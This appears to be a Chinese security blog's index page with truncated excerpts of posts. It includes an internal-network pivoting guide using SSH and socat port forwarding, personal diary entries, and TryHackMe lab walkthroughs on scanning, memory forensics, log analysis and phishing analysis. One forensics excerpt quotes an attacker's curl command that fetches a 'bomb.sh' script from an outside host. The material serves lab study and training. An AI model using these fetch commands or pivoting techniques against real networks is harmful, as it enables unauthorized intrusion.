关于渗透测试中内网穿透问题
前言在内网渗透中经常遇到在需要利用已经拿到权限的机器来进行内网穿透来访问内网中的其他机器。于是本文用于整理和学习自己之前常用的一些方式。
先从8080端口入手,是一个shiro框架,可以用shiroattack直接一把梭拿到权限再做一个反弹shell
所用机器:
VPS,并且在上面安装了msf与搭建了靶场
kali
演示靶机采用
https://github.com/CTF-Archives/Puff-Pastry
8080是开设在外网的shiroWeb框架
在内网的8081开设了thinkphp服务
详细网络拓扑见github项目
反向SSH如果能拿到ssh登录权限的话
ssh -L target-port:localhost:port1 user@ip
-L参数指定目标机器上需要进行流量转发的端口转发到本机的port1
SOCAT需要在靶机上存在socat
sudo socat tcp-listen:target-port,reuseaddr,fork tcp:127.0.0.1:port1
target-port:对外开放的端口,可用于代理
port1:需要转发的端口
./s ...
2023年度总结
2023,进入大学之后的第二年呢。也许今年在人生中只是一个非常平常的一年的,如果用一个词来形容,大概是沉淀吧233从年初的跟着学长后面疯狂问的小学弟到了现在还算是有些积累的学长233仔细想来总算是在网安领域小入了个门吧(虽然不是很想这么说但事实确是如此233)然后也算是彻底奉献给了“渗透”吧,非常幸运,也是挺喜欢这个方向的,接下来一年也要继续沉淀!入学了一学期的懵懂期之后,也是逐渐老油条了起来233各种翘课什么的这才是带学生啊。在年中的时候创办了个人博客,也算是开始一些知识的积累和分享了吧,那几个月时间是知识快速积累的时候啊。编曲方面,经过一年的学习加实践历练,现在总算有了些许经验,也能够写出一首完整的曲子了呢,也是非常享受这个过程。总之今年的收获还是比较满意的吧,但是比较不足的是日语学习和课外阅读花的时间太少了,明年要继续努力啊。总之,今年是比较满意的一年吧,2024请多指教OK(ゝω・´★)
23-12杂谈
今年也要结束了呀。但其实感觉还是挺漫长的。虽然但是还是先写一下这个月的总结。过几天再写一篇年度总结好了。总之这个月也过得非常快啊,算是期中考试还算比较轻松的一个月吧。上上水课,愉快的打打thm,排名也是非常迅速地来到了6500左右。收获还算比较大吧。除此之外成功地入坑了绯染天空,非常符合我的电波www虽然也是一直处于一个摆烂状态在玩。然后天气也是急剧转冷,在今年快结束的几天成功的获得了流感,半死不活的,也是越来越厌恶上课了。不知道为什么,最后几天的心态,或者说是这一整个月的心态都非常的浮躁唉,无法冷静思考,冷静下来之后就感觉缺乏理性,总是草率地做出一些判断和决定,真是讨厌的感觉啊。元旦假期,期末复习的任务非常的重,也并不打算出去玩,预计是想找个地方冷静一下,好好思考些问题。此外,键政键多了逐渐变得非常虚无主义了(悲,啊,有种想就这样一事无成 无所事事地下去等待死亡的想法。
打靶记录(八一)之THMAthena
端口扫描nmap --min-rate=10000 -p- 10.10.114.27Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-26 14:22 UTCNmap scan report for ip-10-10-114-27.eu-west-1.compute.internal (10.10.114.27)Host is up (0.0084s latency).Not shown: 65531 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh80/tcp open http139/tcp open netbios-ssn445/tcp open microsoft-dsMAC Address: 02:AB:07:41:29:CF (Unknown)Nmap done: 1 IP address (1 host up) scanned in 4.13 seconds
nmap -sV -sT -sC -O -p22,80,139,445 10. ...
打靶记录(八十)之THMVulnNetdotjar
端口扫描nmap --min-rate=10000 -p- 10.10.255.237Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-24 06:43 UTCNmap scan report for ip-10-10-255-237.eu-west-1.compute.internal (10.10.255.237)Host is up (0.0091s latency).Not shown: 65533 closed tcp ports (reset)PORT STATE SERVICE8009/tcp open ajp138080/tcp open http-proxyMAC Address: 02:74:3F:1B:8A:3F (Unknown)Nmap done: 1 IP address (1 host up) scanned in 3.46 seconds
nmap -sT -sV -sC -O -p8009,8080 10.10.255.237Starting Nmap 7.93 ( https://nm ...
打靶记录(七九)之THMTheServerFromHell
端口扫描端口扫描,WTF直接干了几万个端口出来。看了下房间的提示,从1337端口开始
nc 10.10.200.74 1337 Welcome traveller, to the beginning of your journeyTo begin, find the trollfaceLegend says he's hiding in the first 100 portsTry printing the banners from the ports
提示让我们打印输出,nc一下1,2,3,端口试试发现回显了一行行的字符,写一个bash脚本来循环nc1至100端口并将输出保存下来
#!/bin/bash# 指定要连接的 IP 地址IP_ADDRESS="10.10.200.74"# 指定保存输出的文本文件OUTPUT_FILE="output.txt"# 循环连接端口范围,并将输出追加到文件for ((PORT=1; PORT<=100; PORT++)); do echo "Connecting to $IP_ADDRESS:$PO ...
打靶记录(七八)之THMBookStore
端口扫描nmap --min-rate=10000 -p- 10.10.77.138Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-23 05:42 UTCNmap scan report for ip-10-10-77-138.eu-west-1.compute.internal (10.10.77.138)Host is up (0.0043s latency).Not shown: 65532 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh80/tcp open http5000/tcp open upnpMAC Address: 02:BB:D6:ED:30:03 (Unknown)Nmap done: 1 IP address (1 host up) scanned in 3.84 seconds
nmap -sT -sV -sC -O -p22,80,5000 10.10.77.138Starting Nmap 7.93 ( ht ...
打靶记录(七七)之THMForensics
Volatility forensics这个转储文件的操作系统是什么?
python2 vol.py -f ~/桌面/victim.raw imageinfoVolatility Foundation Volatility Framework 2.6.1INFO : volatility.debug : Determining profile based on KDBG search... Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_24000, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_24000, Win7SP1x64_23418 AS Layer1 : WindowsAMD64PagedMemory (Kernel AS) AS Layer2 : FileAddressSpace (/home/mi ...
打靶记录(七六)之THMDisgruntled
Task3用户使用提升的权限在计算机上安装了软件包。根据日志,完整的命令是什么?
cat /var/log/auth.log |grep install
COMMAND=/usr/bin/apt install dokuwiki
运行上一个命令时,当前工作目录(PWD)是什么?
/home/cybert
Task4在安装上一个任务中的程序包后创建了哪个用户?
cat /var/log/auth.log |grep useradd
it-admin
一个用户后来被赋予了sudo特权。sudoers文件是什么时候更新的?
cat /var/log/auth.log |grep visudo
Dec 28 06:27:34
使用“vi”文本编辑器打开脚本文件。这个文件的名称是什么?
cat /var/log/auth.log |grep vi
bomb.sh
Task5创建文件时使用的命令是什么 bomb.sh
cat /home/it-admin/.bash
curl 10.10.158.38:8080/bomb.sh –output bomb.sh
文件已重命名并移动到 ...
打靶记录(七五)之THMMemoryForensics
LoginWhat is John’s password?
python3 vol.py -f ../../Snapshot6.vmem windows.infoVolatility 3 Framework 2.5.2WARNING volatility3.framework.layers.vmware: No metadata file found alongside VMEM file. A VMSS or VMSN file may be required to correctly process a VMEM file. These should be placed in the same directory with the same file name, e.g. Snapshot6.vmem and Snapshot6.vmss.Progress: 100.00 PDB scanning finished Variable ValueKernel Base 0xf80002 ...
打靶记录(七四)之THMCarnage
收到攻击的主机ip应该是10.9.23.102
第一次HTTP连接到恶意IP的日期和时间是什么?
选择wireshark最上方的”view->display format->UTC data time of day”
过滤http协议,第一条流量,右键copy->as filter
2021-09-24 16:44:38
下载的zip文件的名称是什么?
也是第一条流量,documents.zip
托管恶意zip文件的域是什么?
追踪第一条流量的http流,可以找到请求中的host是attirenepal.com
如果不下载文件,zip文件中的文件名是什么?
在同一条流量中,能看到zip的文件头中chart-1530076591.xls
下载zip文件的恶意IP的Web服务器的名称是什么?
在同一条流量中,server字段:LiteSpeed
上一个问题中的Web服务器版本是什么?
同一条流量中x-powered-by字段:PHP/7.2.34
恶意文件从多个域下载到受害者主机。这项活动涉及哪三个
根据房间提示,https协议,并且有时间范围
既然有https,那么必然 ...
打靶记录(七三)之THMTheGreenholtPhish
什么时候收到的:
6/10/20(最右上角)
谁发送的:
Mr. James Jackson
他的电子邮件地址是什么:
info@mutawamarine.com
什么电子邮件地址将收到回复此电子邮件:
info.mutawamarine@mail.com
原始IP是什么:
10.201.192.162 右上角”more->view source”
谁是原始IP的所有者?
使用: https://www.whois.com/whois 搜索192.119.71.157
Hostwinds LLC
返回路径域的SPF记录是什么:
“返回域”(Return-Path)通常是指电子邮件中的一个字段,用于指定在邮件无法成功投递时接收反弹(bounces)或非递送通知的邮件地址
Sender Policy Framework(SPF)记录是一种DNS记录,通过指定哪些邮件服务器被授权代表域发送电子邮件
dig txt mutawamarine.com
v=spf1 include:spf.protection.outlook.com -all
返回路径域的DMARC记录是什么:
DMA ...